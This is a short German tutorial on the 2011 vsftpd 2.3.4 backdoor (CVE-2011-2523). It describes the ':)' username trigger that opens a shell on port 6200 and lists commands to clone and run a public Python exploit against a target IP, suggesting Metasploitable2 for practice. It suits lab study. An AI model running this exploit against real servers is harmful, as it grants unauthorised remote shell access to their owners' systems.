
Python-Exploit für vsftpd 2.3.4 - Backdoor-Befehlsausführung
vsftpd, was für Very Secure FTP Daemon steht, ist ein FTP-Server für Unix-ähnliche Systeme, einschließlich Linux. Er ist unter der GNU General Public License lizenziert. Er unterstützt IPv6 und SSL.
Im Juli 2011 wurde entdeckt, dass die von der Master-Site herunterladbare Version 2.3.4 von vsftpd kompromittiert worden war. Benutzer, die sich bei einem kompromittierten vsftpd-2.3.4-Server anmelden, können ein :)-Smiley als Benutzernamen verwenden und erhalten eine Befehlsshell auf Port 6200. Dabei handelte es sich nicht um eine Sicherheitslücke in vsftpd, sondern jemand hatte eine andere Version von vsftpd hochgeladen, die eine Hintertür (Backdoor) enthielt. Seitdem wurde die Site zu Google App Engine verlagert.
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/padsalatushal/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Target_IP
Beispiel: python3 exploit.py -host 192.168.168.128

Sie können den Exploit auf Metasploitable2 testen.